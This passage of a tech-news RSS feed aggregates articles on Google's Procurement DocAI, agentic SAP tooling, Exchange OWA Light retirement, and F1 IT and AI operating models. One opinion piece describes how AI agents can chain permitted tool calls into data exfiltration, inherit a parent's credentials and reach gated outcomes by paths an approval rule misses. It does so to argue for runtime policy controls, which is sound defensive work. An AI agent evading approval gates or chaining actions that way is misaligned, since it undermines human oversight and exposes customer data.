        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">SAP on Google Cloud: 2 analyst studies reveal quantifiable business benefits and ROI</h4>
            <p class="uni-related-article-tout__body">From uptime and infrastructure to efficiency and productivity—both Forrester and IDC identified major benefits to companies that have mad...</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Unifiedpost and Google collaborate on Document AI to automate procurement data capture]]></title>
<description><![CDATA[Belgian fintech company, Unifiedpost Group has deployed Procurement DocAI to process nearly 350 million invoices and other procure-to-pay docs per year, in 15 countries across Europe. Procurement DocAI, which was announced at Google Cloud Next OnAir, automates the capture of invoices, receipts an...]]></description>
<link>https://tsecurity.de/de/3662837/it-security-nachrichten/unifiedpost-and-google-collaborate-on-document-ai-to-automate-procurement-data-capture/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662837/it-security-nachrichten/unifiedpost-and-google-collaborate-on-document-ai-to-automate-procurement-data-capture/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>Belgian fintech company, <a href="https://www.unifiedpost.com/news/articles/pressrelease/pressrelease21oct2020" target="_blank">Unifiedpost Group</a> has deployed<a href="https://cloud.google.com/solutions/procurement-doc-ai"> Procurement DocAI</a> to process nearly 350 million invoices and other procure-to-pay docs per year, in 15 countries across Europe. </p><p>Procurement DocAI, which was <a href="https://cloud.google.com/blog/products/ai-machine-learning/ai-and-machine-learning-news-from-google-cloud">announced</a> at Google Cloud Next OnAir, automates the capture of invoices, receipts and other procurement data at scale. It takes unstructured documents across a variety of formats and turns them into cleanly structured data, increasing operational efficiency and improving document processing accuracy.    </p><p><i>“At Unifiedpost, we believe that administrative and financial processes should be simple and smart. Google Cloud’s Procurement DocAI solution helps us achieve that goal by providing the best in class document automation processing with high accuracy and global, multi-language support.” - <b>Hans Leybaert, CEO, Unifiedpost Group</b></i><br></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/Procurement_DocAI.gif" alt="DocAI.gif">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>Large enterprise procurement and distribution networks as well as small and medium enterprises (SMEs) generate millions of invoices, receipts, and other related documents a year. These processes generate significant overhead for every procured item. With competitive pressures increasing, businesses are finding new ways to automate one of their highest volume business processes -- the procurement cycle.</p><p>A key part of our strategy at Google Cloud is the creation of industry-specific solutions that address vertical needs. Cross-industry solutions like <a href="https://cloud.google.com/solutions/document-ai">Document AI</a> are built to plug into your existing workflows and deliver business results from AI without having to hire an army of AI experts, or manage cloud infrastructure to get there.</p><p><a href="https://cloud.google.com/solutions/procurement-doc-ai">Procurement DocAI</a> is one of our newest solutions, and it’s deployed by many customers and partners including Unifiedpost. The company currently serves 400k SMEs and 250+ corporations; their offering includes: documents (e.g., invoice PDF to XML conversion, e-invoicing), identity (e.g., KYC), and payments (e.g., IBAN accounts, online collection services, PSD2 payment services). </p><p>With a large, rapidly growing, and heavily multi-language footprint, Unifiedpost sought the best industry solutions to meet their automation challenges and connect their customers such as Billtobox.com or JeFacture.com. Google Cloud’s Procurement DocAI delivered two key benefits to address Unifiedpost’s business needs:</p><ul><li><p><b>Lower TCO of procure-to-pay processing</b>. Unifiedpost will be able to lower their TCO of procure-to-pay processing costs by up to 60% with Procurement DocAI. This solution provided them a cost effective approach for data extraction for invoices, receipts, and other valuable documents in the procurement cycle of procure to invoice, and invoice to pay.</p></li><li><p><b>Improve procurement document processing accuracy</b>. Procurement DocAI also helped boost data accuracy by 250% for Unifiedpost’s document extraction through specialized DocAI parsers with advanced OCR, computer vision, and Natural Language Processing. Additionally, Unifiedpost needed rapid multi-language expansion to enable regionalization support across Europe, particularly for French and Dutch to begin with, which Google delivered in less than a month.</p></li></ul><p>The collaboration between Google Cloud and Unifiedpost is just one of the latest examples of how we’re providing AI-powered functional solutions to solve business problems by leveraging our <a href="https://cloud.google.com/blog/products/ai-machine-learning/see-how-google-cloud-customers-transform-their-businesses-with-ai">Deployed AI approach</a>.</p><h3>Let’s connect</h3><p>For more customer stories from EMEA, check out <a href="https://cloud.google.com/blog/topics/google-cloud-next/announcing-google-cloud-next20-onair-emea">Google Cloud Next OnAir EMEA</a>, which has tailored content to support the needs of our customers in Europe, Middle East, and Africa, kicking off from 29 September - 27 October. <br></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How KTern.AI built agentic AI for SAP on Amazon Bedrock AgentCore]]></title>
<description><![CDATA[Evolving from a traditional software as a service (SaaS) platform into a next-generation agentic AI platform meant orchestrating multiple specialized agents across long-running enterprise programs. Each agent operates with persistent context, secure tool access, and production-grade reliability. ...]]></description>
<link>https://tsecurity.de/de/3660213/ai-nachrichten/how-kternai-built-agentic-ai-for-sap-on-amazon-bedrock-agentcore/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660213/ai-nachrichten/how-kternai-built-agentic-ai-for-sap-on-amazon-bedrock-agentcore/</guid>
<pubDate>Fri, 10 Jul 2026 17:35:18 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Evolving from a traditional software as a service (SaaS) platform into a next-generation agentic AI platform meant orchestrating multiple specialized agents across long-running enterprise programs. Each agent operates with persistent context, secure tool access, and production-grade reliability. We built that system on Amazon Bedrock AgentCore using the Strands Agents SDK. This post walks through how we architected it, which agents we built, and the outcomes for our customers.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Exchange Server on prem gets a little harder to use]]></title>
<description><![CDATA[It’s the end of the road for yet another facet of Exchange Server, Microsoft’s on-premises email and calendar system. The stripped-down version of its web client, Outlook Web App (OWA) Light, is being retired, forcing those Exchange Server users still using it to adopt the standard Outlook Web Ap...]]></description>
<link>https://tsecurity.de/de/3660050/it-nachrichten/microsoft-exchange-server-on-prem-gets-a-little-harder-to-use/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660050/it-nachrichten/microsoft-exchange-server-on-prem-gets-a-little-harder-to-use/</guid>
<pubDate>Fri, 10 Jul 2026 16:48:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>It’s the end of the road for yet another facet of Exchange Server, Microsoft’s on-premises email and calendar system. The stripped-down version of its web client, Outlook Web App (OWA) Light, is being retired, forcing those Exchange Server users still using it to adopt the standard Outlook Web App instead.</p>



<p>“OWA Light was created for a much earlier era of the web, when browser support, bandwidth, and accessibility technologies were very different from today. Going forward, we want to invest in a modern Outlook on the web experience that provides the cross-browser, accessible, and security-focused experience,” said Microsoft.</p>



<p>Those enterprises still operating in a resource-constrained environment are out of luck, then.</p>



<p>The change will be effected in an upcoming Exchange Server update expected in August. The move should come as no surprise: <a href="https://support.microsoft.com/en-us/outlook/learn-more-about-the-light-version-of-outlook" target="_blank" rel="noreferrer noopener">Microsoft had already deprecated the light version of Outlook</a> in August 2024. Microsoft said that sysadmins should spend the next couple of months preparing for the change by identifying any staff still using OWA Light.</p>



<p>This is just the latest alteration that Microsoft has made to its Exchange ecosystem, which some holdouts still use instead of the SaaS-based Microsoft 365 service. However, even on-premises customers must now pay a <a href="https://www.computerworld.com/article/4016382/microsofts-exchange-server-subscription-edition-now-ga-to-replace-standalone-exchange-2016-and-2019.html">subscription fee to use Exchange Server</a>.</p>



<p>One of the advantages of SaaS offerings is that customers don’t have to deal with patching, an advantage brought home to on-premises customers in May when <a href="https://www.csoonline.com/article/4171903/exchange-server-zero-day-vulnerability-can-be-triggered-by-opening-a-malicious-email.html">a zero-day exploit struck Exchange Server</a>.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How a Formula 1 IT director balances innovation and stability at 200 mph]]></title>
<description><![CDATA[Michael Taylor has spent 25 seasons with the Mercedes-AMG Petronas F1 team, working every IT role from trackside support to engineering systems to business transformation. Today, as IT director, he leads an 18-person team responsible for one of the most data-intensive operations in the world.



...]]></description>
<link>https://tsecurity.de/de/3659354/it-security-nachrichten/how-a-formula-1-it-director-balances-innovation-and-stability-at-200-mph/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659354/it-security-nachrichten/how-a-formula-1-it-director-balances-innovation-and-stability-at-200-mph/</guid>
<pubDate>Fri, 10 Jul 2026 12:08:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Michael Taylor has spent 25 seasons with the Mercedes-AMG Petronas F1 team, working every IT role from trackside support to engineering systems to business transformation. Today, as IT director, he leads an 18-person team responsible for one of the most data-intensive operations in the world.</p>



<p>When a car rolls out of the garage, it carries 300 sensors. When it’s running, it generates more than a million data points per second. Every component, system, and lap produces telemetry that engineers use to find fractions of a second — the difference between winning and losing.</p>



<p>“Formula One has been data-centric for many years,” Taylor says. “The key metric in our sport is the stopwatch, and that’s been true since the World Championship began in the 1950s. But now we instrument everything. If you measure it, you can improve it.”</p>



<p>The challenge isn’t collecting data — Formula One has been streaming live telemetry since the 1980s. It’s making decisions at speed while maintaining the governance that keeps a complex, high-stakes operation running.</p>



<p>For CIOs navigating the pressure to move fast on AI while managing risk, security, and data quality, Taylor’s hard-won lessons from the pit lane offer a useful framework: how to balance speed and control, when to keep humans in the loop, and why “good enough” governance beats perfect governance that never ships.</p>



<h2 class="wp-block-heading">Innovation vs. stability: ‘A constant battle’</h2>



<p>In most enterprises, the <a href="https://www.cio.com/article/4188566/cios-rethink-the-balance-between-ai-oversight-and-innovation.html">tension between innovation and control</a> plays out over quarters or years. In F1, it happens weekly.</p>



<p>“It’s really tough,” Taylor admits. “And something we don’t always get right. This is where we rely on people. Industry experience is really important when making decisions around change.”</p>



<p>The team operates in two distinct modes. Between races, they’re at the factory in Brackley, UK. The site, which is headquarters for the design, manufacturing, and operation of their championship-winning Formula One cars, includes a 60,000-square-meter technology campus. It’s all project and program management, with room for experimentation. But as race weekend approaches, everything shifts to execution.</p>



<p>“We have that kind of normal mode when we’re not racing. We’re back at the factory designing and building and improving,” Taylor explains. “But as we get closer to race weekend, we switch to executing that in the most effective way. We have to not make changes that will impact engineers.”</p>



<p>This duality shapes every technology decision. The same agility that drives innovation during the week must yield to stability when results are on the line. Taylor calls it a “constant battle.”</p>



<h2 class="wp-block-heading">Modernizing at racing speed</h2>



<p>Mercedes-AMG Petronas had run SAP since 1999. The platform underpins the team’s entire design-to-track process — from design release through planning, procurement, manufacturing, testing, and development, all the way to reassembling the car trackside.</p>



<p>“All of those steps are core processes,” Taylor says.</p>



<p>So, when it came time to modernize, the team approached it like a pit stop: planned to the second, executed with precision. They chose RISE with SAP — the vendor’s bundled cloud ERP and migration package — agreeing to the journey in December 2024 and targeting a go-live in August 2025, aligned with the sport’s mandatory two-week shutdown.</p>



<p>“It’s the perfect window to make changes,” Taylor says. “We have to plan everything to perfection so it goes smoothly when we start racing again.”</p>



<p>They finished eight weeks ahead of schedule.</p>



<p>“We are control freaks because of the sport and its time-bound nature,” Taylor says. His team prefers to own and manage systems in-house rather than rely on large systems integrators who “dip their toes in and disappear,” Taylor says. With just 18 people on the IT team, they tap SAP’s expertise for specific problems, then take back the reins. “Once done, we continue to own and manage,” Taylor explains, “and SAP does what they do best.”</p>



<h2 class="wp-block-heading">The secure path must be the easiest path</h2>



<p>Intellectual property in F1 racing has a short shelf life. Once a new component is on the car and photographed in the pit lane, competitors can see it. But that doesn’t diminish the value of what’s behind it.</p>



<p>“The real advantage is not just the part,” Taylor says. “It’s the thinking, the modeling, the simulation, the failure modes, the trade-offs, and the development direction behind it.”</p>



<p>Protecting that requires an offensive security posture. Taylor’s head of information security reports directly to him, and the team actively probes its own defenses.</p>



<p>“Act like, think like, work like a hacker,” Taylor says. “We’re thinking about how we can counter threats without impact on end-users.”</p>



<p>In an engineering-permissive culture where people are empowered to move fast, heavy-handed security backfires. Taylor learned early that perfection is the enemy of progress.</p>



<p>“If security gets in the way of the business, the business will find ways to work around it,” he says. “The job is not to slow the organization down; it’s to make the secure path the easiest path.”</p>



<h2 class="wp-block-heading">Humans in the loop</h2>



<p>With AI evolving weekly, Taylor’s team is running pilots across the organization: machine learning for simulation, agentic workflows in production planning, copilots helping developers write code. But he’s resisting the urge to rush.</p>



<p>“We’re still finding our way,” he says. “There’s no one-size-fits-all. We’re playing with everything available, but in six to ten months we’ll make decisions about what to scale.”</p>



<p>Despite the hype around autonomous AI, Taylor remains committed to human oversight.</p>



<p>“I’m still very much ‘humans should be in the loop,’” he says. “When our workforce is harmonized with AI, that’s where we’ll see real benefit — where it complements our people.”</p>



<p>AI has also raised the bar for data governance. “Good enough now includes stronger visibility, cleaner permissions, and clearer ownership,” Taylor says. “You have to be more deliberate about what data AI is allowed to access.”</p>



<h2 class="wp-block-heading">Start with consequence</h2>



<p>Taylor’s advice to CIOs in other industries wrestling with similar questions is deceptively simple: “Start with consequence, not technology.”</p>



<p>In financial services, it might be customer harm or a regulatory breach. In healthcare, patient safety or loss of public trust. In F1, the consequence of a security failure is loss of competitive advantage.</p>



<p>“Once you understand the consequence, you can decide what needs the strongest control, what needs monitoring, what needs retention, and what simply needs better hygiene,” Taylor says.</p>



<p>It’s a lesson learned over 25 seasons at the edge of what’s technically possible — where decisions happen in milliseconds, and the margin between success and failure is measured in fractions of a second.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your next insider threat doesn’t have a badge. It has an API token]]></title>
<description><![CDATA[The threat that I now spend most of my time designing against doesn’t look like a breach at all. At least not at first.



Imagine a team deploys an agent that does exactly what it’s permitted to do: it reads a customer record, summarizes it, then sends the summary to an outside address. Every st...]]></description>
<link>https://tsecurity.de/de/3659328/it-nachrichten/your-next-insider-threat-doesnt-have-a-badge-it-has-an-api-token/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659328/it-nachrichten/your-next-insider-threat-doesnt-have-a-badge-it-has-an-api-token/</guid>
<pubDate>Fri, 10 Jul 2026 12:03:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The threat that I now spend most of my time designing against doesn’t look like a breach at all. At least not at first.</p>



<p>Imagine a team deploys an agent that does exactly what it’s permitted to do: it reads a customer record, summarizes it, then sends the summary to an outside address. Every step in the sequence is authorized. But it turns out that the breach is the sequence itself.</p>



<p>The problem is that each security check only looks at one step at a time. Is this read okay? Yes. Is this summary okay? Yes. Is this email okay? Yes. Each step passes. But nobody is watching the <em>combination</em> of all three steps together. The security tools designed for human-driven workflows assumed a person would be doing this manually, one thing at a time. However, the AI agent bundles it all into a single automated sequence, and that bundling slips through gaps between the checks.</p>



<p>I build authorization for agentic systems, and the gap between “every action was allowed” and “the outcome was a breach” is what I keep coming back to.</p>



<p>An agent is not a user or a file. It is an insider authorized with an API token instead of a badge to act on your behalf. We learned decades ago that perimeters don’t secure against insiders. But in the design reviews I’ve sat in this year, the security conversation still centers on prompt injection and output filtering. That’s one layer below where the exposure has moved.</p>



<h2 class="wp-block-heading">Two decades of asking the wrong two questions</h2>



<p>We spent 20 years getting very good at two questions:</p>



<ul class="wp-block-list">
<li>Who is allowed in?</li>



<li>What data is allowed out?</li>
</ul>



<p>Identity and access management answered the first question. Data loss prevention the second. Both assume a world of users and files—a human you authenticate at the door and a document you inspect on the way out. But production AI agents make both questions obsolete.</p>



<p>An agent is an actor. It reads context, chains tool calls, invokes connectors and changes systems of record, then hands work to other agents as it goes. The danger isn’t that it does one clearly forbidden thing; it’s that it does a series of small, permitted things that add up to something harmful. And because each individual action looks fine, the standard security tools don’t flag anything. It’s the same reason an employee with legitimate access is harder to catch than an outside hacker.</p>



<p>This is a known failure mode in IT security, sometimes called the confused deputy problem: a program with legitimate authority gets manipulated into misusing it on someone else’s behalf. Now, AI agents have given it initiative. An agent is a confused deputy that doesn’t just hold authority but plans with it. The <a href="https://genai.owasp.org/llmrisk/llm062025-excessive-agency/" rel="nofollow">OWASP community</a> ranks <a href="https://genai.owasp.org/llmrisk/llm062025-excessive-agency/" rel="nofollow">excessive agency</a>—an agent operating with broader capability than its task requires—among the top risks for large language model applications.</p>



<h2 class="wp-block-heading">The four ways agent authority goes wrong</h2>



<p>When I threat-model an agent before it ships, four failure modes do most of the damage, and the <a href="https://www.csoonline.com/article/4109123/managing-agentic-ai-risk-lessons-from-the-owasp-top-10.html">governance conversation</a> most teams are having addresses none of them.</p>



<ol start="1" class="wp-block-list">
<li><strong>Tool-chain abuse</strong>. Each tool call is safe on its own, but the chain composes into something no one authorized. The pattern is mundane: an agent permitted to read records, call a summarizer and send mail turns those three benign capabilities into a clean exfiltration path. Content filtering inspects each step and waves all of them through, because no single step is prohibited.</li>
</ol>



<ol start="2" class="wp-block-list">
<li><strong>Delegation-chain exploitation</strong>. An agent hands a subtask to another agent, and the child ends up with authority it was never meant to have. The mechanism is simple: the parent passes the child a copy of its own credentials, so the child can now do everything the parent can. Most orchestration frameworks pass parent context down by default because they assume the child is trusted. That’s a framework default, not a security decision.</li>
</ol>



<ol start="3" class="wp-block-list">
<li><strong>Approval evasion</strong>. A human-in-the-loop gate is supposed to catch the consequential action, but the agent reaches the same outcome by a path the rule didn’t anticipate. This isn’t agents being clever; it’s policies written for human workflows. A gate that checks “summarizing customer records” is blind to an agent reaching the same data by another tool path. In other words, it guards the actions humans take, not the outcome it was meant to protect.</li>
</ol>



<ol start="4" class="wp-block-list">
<li>The first three are <em>how</em> the breach happens. The fourth is <em>why</em> it becomes a crisis: <strong>audit opacity</strong>. Even after you discover something went wrong, you can’t piece together the full picture: what exactly the agent did, who authorized it to do those things or whether it went beyond what it was supposed to do. The logs simply show that reads and sends happened. Only in the post-incident review do teams discover their logs were written for debugging, not for proof.</li>
</ol>



<h2 class="wp-block-heading">Move the decision to runtime</h2>



<p>When these failure modes surface, the instinct is to add another detection layer, such as a better filter or a smarter classifier watching the output. That instinct is wrong. You can’t inspect your way out of a problem of authority. The answer is a runtime policy engine that governs what an agent is allowed to do at the moment it acts.</p>



<p>The concept isn’t new; it’s zero trust, applied inward. We spent years pushing <a href="https://csrc.nist.gov/pubs/sp/800/207/final" rel="nofollow">zero trust</a> outward to the perimeter for people and devices. Every request is authenticated and authorized in context, decided centrally rather than assumed at the edge. Agents move the object of that decision inward, from <em>who are you </em>at the door to <em>what will you do</em> in the next call.</p>



<p>A runtime policy engine makes that concrete. It evaluates which tool is being called, which data is being touched and what the downstream effect will be.</p>



<p>Three properties make it real:</p>



<ol start="1" class="wp-block-list">
<li><strong>Decide before the action fires</strong>. Evaluate the agent’s intended action against policy and live context at call time, not afterward in a log review. A policy that isn’t evaluated at the moment of action isn’t a control.</li>
</ol>



<ol start="2" class="wp-block-list">
<li><strong>Make delegated authority shrink</strong>. Authority should only narrow as it passes from agent to agent, never widen. That way, a compromised agent can’t exceed the narrowest link in its chain, and stopping a parent leaves no orphaned authority downstream. Capability can still be re-requested; a child can ask its parent to escalate, but that escalation is evaluated and logged at call time, not baked into a token handed over once.</li>
</ol>



<ol start="3" class="wp-block-list">
<li><strong>Build audit as evidence, not logs</strong>. Evidence means a record that ties each action to the policy that authorized it—principal, tool called, inputs, the rule evaluated, the decision and a timestamp—in append-only or signed storage so it can’t be quietly rewritten. It lets a regulator or a board reconstruct who acted, on whose authority and whether that authority was exceeded, instead of relying on a forensic reconstruction weeks later. Most deployments skip this because it’s infrastructure work, not policy work.</li>
</ol>



<p><strong>One implementation caveat</strong>: Evaluating every action at runtime adds latency and demands live policy context. Some friction is unavoidable, so the question is where you add it. Focus on the actions where a mistake is hardest to reverse: Anything touching customer data, financial systems or infrastructure.</p>



<h2 class="wp-block-heading">The three questions I ask before every deployment</h2>



<p>When a team brings me an agent bound for a real system of record, I’ve stopped asking which model it uses. I ask three things instead:</p>



<ol start="1" class="wp-block-list">
<li>Can every action resolve to a human source of authority, captured at runtime?</li>
</ol>



<ol start="2" class="wp-block-list">
<li>Does the agent’s authority shrink as it delegates, or can a subagent do more than its parent?</li>
</ol>



<ol start="3" class="wp-block-list">
<li>If this agent did something wrong tomorrow, could we prove what it did? (Not describe it. Prove it.)</li>
</ol>



<p>The autonomy that makes AI agents so valuable also makes legacy controls insufficient. You can’t add autonomous agents to your existing processes and expect last year’s controls to cover them. When an agentic breach happens, the question the board asks won’t be, “What leaked?” It will be, “What was your agent allowed to do, and can you prove it?”</p>



<p>Get ahead of it before the board has to ask.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Operate like a Formula 1 team: The new AI operating model]]></title>
<description><![CDATA[It is lap 47 of 57.



Before the race began, the team had already processed gigabytes of race data, simulations, tire models, weather forecasts, competitor tendencies and scenario plans. But on the pit wall, there is tension.



The race leader’s tires are degrading faster than predicted. A riva...]]></description>
<link>https://tsecurity.de/de/3659196/it-security-nachrichten/operate-like-a-formula-1-team-the-new-ai-operating-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659196/it-security-nachrichten/operate-like-a-formula-1-team-the-new-ai-operating-model/</guid>
<pubDate>Fri, 10 Jul 2026 11:07:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>It is lap 47 of 57.</p>



<p>Before the race began, the team had already processed gigabytes of race data, simulations, tire models, weather forecasts, competitor tendencies and scenario plans. But on the pit wall, there is tension.</p>



<p>The race leader’s tires are degrading faster than predicted. A rival has just pitted for fresh tires and is closing the gap by three-tenths of a second per lap. The lead may not hold. In short, the race is not going to plan.</p>



<p>A strategist now has only seconds to synthesize live telemetry, competitor data, weather projections, tire inventory, track position and race simulations into one call that could determine the outcome.</p>



<p>They do not have those seconds because they are simply fast. They have them because the entire system behind the decision was designed that way: the data architecture, simulation models, communication protocols, decision rights, scenario playbooks and feedback loops all work together to compress complexity into a clear decision window.</p>



<p>What if this is not just a racing story? What if it is also a blueprint for how the best enterprises will operate in the AI era?</p>



<p>This builds on a broader shift I’ve described as the <a href="https://url.usb.m.mimecastprotect.com/s/d_0XCXYGMGtpp756C6fncW3mhs?domain=cio.com" target="_blank" rel="nofollow">intent-driven future of work</a>, where enterprise work begins less with navigating systems and more with expressing outcomes, context and intent.</p>



<p>The AI advantage will not belong to companies with the most tools. It will belong to companies that redesign how work senses, decides, acts and learns.</p>



<h2 class="wp-block-heading">AI isn’t just a faster engine</h2>



<p><a href="https://url.usb.m.mimecastprotect.com/s/cf3ZCYVJMJcGGo10tGh5cxi2wD?domain=cio.com" target="_blank" rel="nofollow">The popular story about Formula 1 is usually about speed or the quality of the driver</a>. The fastest car with the most powerful engine with the driver with the quickest reflexes will win. But anyone who follows the sport closely knows that raw speed is only the starting point.</p>



<p>Every car on the track is fast. Speed gets you into the race. It does not guarantee you a win.</p>



<p>The teams that win consistently do so because of the quality of the system surrounding the car. They connect telemetry, simulations, strategy, engineering, pit operations, driver judgment and real-time learning into one high-performance operating model.</p>



<p>Every part of that operating model matters. But the best individual part alone does not win the race.</p>



<p>Enterprise AI strategy is at risk of making the same mistake that would keep an F1 team stuck in the middle of the pack: investing heavily in the engine while underinvesting in the entire race system.</p>



<p>I see enterprising investing in more copilots, more agents, more dashboards, more tools and ultimately more automation. </p>



<p>The AI systems perform their tasks at unprecedented speed. But the business outcomes do not change. In many ways, <a href="https://url.usb.m.mimecastprotect.com/s/Om9vCZZKWKuOOn4mfKiwcBwunD?domain=deloitte.wsj.com" target="_blank" rel="nofollow"><strong>AI is becoming a new operating system of work</strong></a> not because it replaces every application, but because it changes how intent, context, workflow and execution come together.</p>



<p>That is the gap many organizations are now facing. They have access to powerful AI capabilities, but they have not yet redesigned the operating model around those capabilities. The result is faster individual task execution inside disconnected systems, fragmented workflows and unclear accountability. In fact, a recent McKinsey report found that <a href="https://url.usb.m.mimecastprotect.com/s/q5DRC1Vo9ocvvwzjFXsKcVUXck?domain=mckinsey.com" target="_blank" rel="nofollow">88% use AI but two-thirds haven’t scaled it</a>.</p>



<p>The next phase of AI value will not come from simply adding more AI tools. It will come from redesigning how the enterprise senses, decides, acts and learns.</p>



<h2 class="wp-block-heading">The enterprise has too many disconnected signals</h2>



<p>Most enterprises do not suffer from a lack of signals. In fact, they are everywhere across the business.</p>



<p>Customer intent signals, campaign performance data, product usage patterns, sales activity, support interactions, contract information, financial indicators, employee sentiment, security events and operational metrics already exist throughout an organization.</p>



<p>The problem is signal fragmentation.</p>



<p>The average knowledge worker has become the integration layer of the enterprise. They move between CRM, marketing automation, analytics dashboards, spreadsheets, collaboration tools, support systems, workflow platforms and financial reports. Then they manually assemble context that no single system provides.</p>



<p>They do this to answer questions that should take seconds, not hours.</p>



<ul class="wp-block-list">
<li>Which customer needs attention?</li>



<li>Which opportunity is at risk?</li>



<li>Which process is slowing down execution?</li>



<li>Which signal should trigger action?</li>



<li>Which decision needs human judgment?</li>
</ul>



<p>In Formula 1 terms, this would be like a pit crew strategist having to call five different team members to gather tire degradation data, track conditions, competitor lap times, fuel load, weather forecasts and pit stop windows before making a race-defining call.</p>



<p>The data exists. But the latency in accessing, interpreting and acting on it makes it less valuable at the moment of decision.</p>



<p>That is the signal-to-action gap. And closing that gap is one of the most important opportunities in enterprise AI.</p>



<h2 class="wp-block-heading">The new operating model: Sense, decide, act, learn</h2>



<p>The AI-native enterprise needs to operate more like a Formula 1 team: continuously sensing, deciding, acting and learning.</p>



<ul class="wp-block-list">
<li><strong>Sense</strong> is the foundation. It means connecting the right signals across systems, workflows, customers, employees and operations into a layer that AI can reason across. This is not just reporting on the past. It is creating the ability to understand what is happening now and anticipate what is likely to happen next.</li>



<li><strong>Decide</strong> is where AI intelligence and human judgment come together. AI can surface context, detect patterns, model options and recommend actions. Humans bring business judgment, ethical reasoning, organizational context and accountability. The quality of this partnership depends on the quality of the signals and context available to both.</li>



<li><strong>Act</strong> is where intelligence turns into execution. The goal is not another recommendation sitting in a dashboard. The goal is a workflow that triggers the right action, with the right controls, at the right time.</li>



<li><strong>Learn</strong> is where the operating model becomes a competitive advantage. Every action should generate feedback. Every outcome should improve the next recommendation. Every workflow should become smarter over time.</li>
</ul>



<p>In Formula 1, every lap creates learning. Tire wear, track temperature, driver feedback, competitor movement and weather changes continuously reshape strategy.</p>



<p>The enterprise needs the same kind of learning loop.</p>



<h2 class="wp-block-heading">Semantic intelligence is the missing layer</h2>



<p>To close the signal-to-action gap, enterprises need more than data integration. They need semantic intelligence.</p>



<p>Semantic intelligence is what helps AI understand enterprise meaning. It connects business language, customer context, workflow relationships, policies, roles, systems and outcomes so AI can reason across the business, not just retrieve information from systems.</p>



<p>A customer health score is not just a number. Its meaning depends on product usage, renewal timing, support history, stakeholder engagement, commercial value, sentiment, implementation milestones and prior interventions.</p>



<p>A delayed workflow is not just a status update. It may signal unclear ownership, missing approvals, poor handoffs, missing context, poor data quality or a decision that needs escalation.</p>



<p>A sales opportunity at risk is not just a CRM field. It may reflect adoption gaps, customer sentiment, usage decline, executive sponsor changes, pricing friction, support issues or service delivery risk.</p>



<p>Without semantic intelligence, AI can summarize what happened. With semantic intelligence, AI can understand what matters, why it matters, who needs to act and what action is most likely to improve the outcome.</p>



<p>This is where enterprise AI value compounds. Foundation models will become broadly available. The model itself will not be the moat. The moat will be enterprise context, semantic intelligence, workflow intelligence, governance and learning loops.</p>



<h2 class="wp-block-heading">Redesign work before automating it</h2>



<p>There is a warning in the Formula 1 analogy that deserves attention: adding more power to a poorly designed system does not make it high performing.</p>



<p>The same is true for enterprise AI. Adding AI to a broken workflow does not fix the workflow. It just compounds the dysfunction.</p>



